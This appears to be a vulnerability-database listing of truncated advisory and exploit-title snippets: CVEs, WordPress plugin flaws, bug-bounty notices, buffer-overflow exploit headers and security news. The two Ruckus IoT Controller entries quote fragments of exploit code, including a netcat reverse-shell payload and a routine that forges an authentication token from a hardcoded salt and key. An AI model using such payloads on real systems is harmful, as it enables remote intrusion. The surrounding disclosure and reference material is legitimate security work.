EUVD-2025-28178

Malicious code in bioql PyPI...

CVE-2024-51641

Cross-Site Request Forgery CSRF vulnerability in Juan Camilo Advanced PDF Generator advanced-pdf-generator allows Stored XSS.This issue affects Advanced PDF Generator: from n/a through = 0.4.0...

WordPress Hide My WP Ghost plugin < 5.2.02 - Hidden Login Page Disclosure vulnerability

Hidden Login Page Disclosure vulnerability discovered by Juan Pablo Gomez Postigo in WordPress Plugin Hide My WP Ghost versions 5.2.02...

WordPress Hide My WP Ghost Plugin < 5.2.02 is vulnerable to Bypass Vulnerability

Software Hide My WP Ghost Type Plugin Vulnerable versions 5.2.02 Fixed in 5.2.02 OWASP Top 10 A4: Insecure Design Classification Bypass Vulnerability CVE CVE-2024-6420 Patch priority Low CVSS severity Low 3.7 Developer Claim ownership PSID c358fc787ef1 Credits Juan Pablo Gomez Postigo Required...

Clinic Queuing System 1.0 Remote Code Execution

Exploit Title: Clinic Queuing System 1.0 RCE Date: 2024/1/7 Exploit Author: Juan Marco Sanchez Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html Version: 1.0 Tested on...

san-juan-airport.com Cross Site Scripting vulnerability OBB-3861337

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

mariajuanapiqueras.com Improper Access Control vulnerability OBB-3804640

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

WordPress Defender Security Plugin < 4.1.0 is vulnerable to Bypass Vulnerability

Software Defender Security Type Plugin Vulnerable versions 4.1.0 Fixed in 4.1.0 OWASP Top 10 A1: Broken Access Control Classification Bypass Vulnerability CVE CVE-2023-5089 Patch priority Low CVSS severity Low 5.3 Developer WPMU DEV PSID e45ed857552b Credits Juan Pablo Gomez Postigo Required...

juanvaldezcafestore.us Cross Site Scripting vulnerability OBB-3042316

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

WordPress Advanced Custom Fields plugin 3.1.1 - 6.0.2 - Custom Field Value Exposure vulnerability

Custom Field Value Exposure Through Parsed Shortcode from User Input vulnerability discovered by Juan Hoffmann in WordPress Advanced Custom Fields plugin versions 3.1.1 - 6.0.2. Solution Update the WordPress Advanced Custom Fields plugin to the latest available version at least 6.0.3...

DDoS-for-hire service provider jailed

Matthew Gatrel, a 33-year-old man from St. Charles, Illinois, has been sentenced to two years in prison for running websites that provide powerful distributed denial-of-service DDoS attacks against internet users and websites. This sentencing resulted in the seizure of his websites, making the...

FreeBSD : Apache httpd -- Path Traversal and Remote Code Execution (d001c189-2793-11ec-8fb1-206a8a720317)

The Apache http server project reports : critical: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 incomplete fix of CVE-2021-41773 CVE-2021-42013. It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a...

Apache httpd -- Path Traversal and Remote Code Execution

The Apache http server project reports: critical: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 incomplete fix of CVE-2021-41773 CVE-2021-42013. It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a...

Ruckus IoT Controller 1.5.1.0.21 Remote Code Execution

Product: Ruckus IoT Controller Ruckus vRIoT Version: &1|nc "+lhost+" "+lport+" /tmp/f; " return payload def generateMagicToken: encdecmethod = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode"utf8" strkey = 'serviceN1authent' strtoenc = 'TlBMVVMx' return encryptencdecmethod, salt, strkey,...

Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution

Product: Ruckus IoT Controller Ruckus vRIoT Version: &1|nc "+lhost+" "+lport+" /tmp/f; " return payload def generateMagicToken: encdecmethod = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode"utf8" strkey = 'serviceN1authent' strtoenc = 'TlBMVVMx' return encryptencdecmethod, salt, strkey,...

Navy Federal Cross Site Scripting

Vendor ------------------------------------------------- Navy Federal - https://www.navyfederal.org/ Product ------------------------------------------------- Front pubic facing application Credit ------------------------------------------------- Arthrocyber http://arthrocyber.com/research/findin...

Netperf 2.6.0 - Stack-Based Buffer Overflow

Netperf 2.6.0 - Stack-Based Buffer Overflow Exploit Author: Juan Sacco - http://exploitpack.com Tested on: Kali i686 GNU/Linux Description: Netperf 2.6.0 s a benchmark tool than developed by Helett Packard that can be used to measure the performance of many different types of networking. It...

DNS Manipulation in Venezuela in regards to the Humanitarian Aid Campaign

Venezuela is a country facing an uncertain moment in its history. Reports suggests it is in significant need of humanitarian aid. On February 10th, Mr. Juan Guaidó made a public call asking for volunteers to join a new movement called "Voluntarios por Venezuela" Volunteers for Venezuela. Accordin...

IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter) Exploit

Exploit for windows platform in category local exploits !/usr/bin/env python ------------------------------------------------------------------------------------------------------------------------------------ Exploit: IP-Tools 2.5 - Local Buffer OverflowEggHunter Date: 2019-02-06 Author: Juan...

LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)

Exploit Title: LanSpy 2.0.1.159 - Local Buffer Overflow SEH Egghunter Exploit Author: bzyo Date: 12-19-18 Twitter: @bzyo Vulnerable Software: LanSpy 2.0.1.159 Vendor Homepage: https://lizardsystems.com Version: 2.0.1.159 Software Link 1:...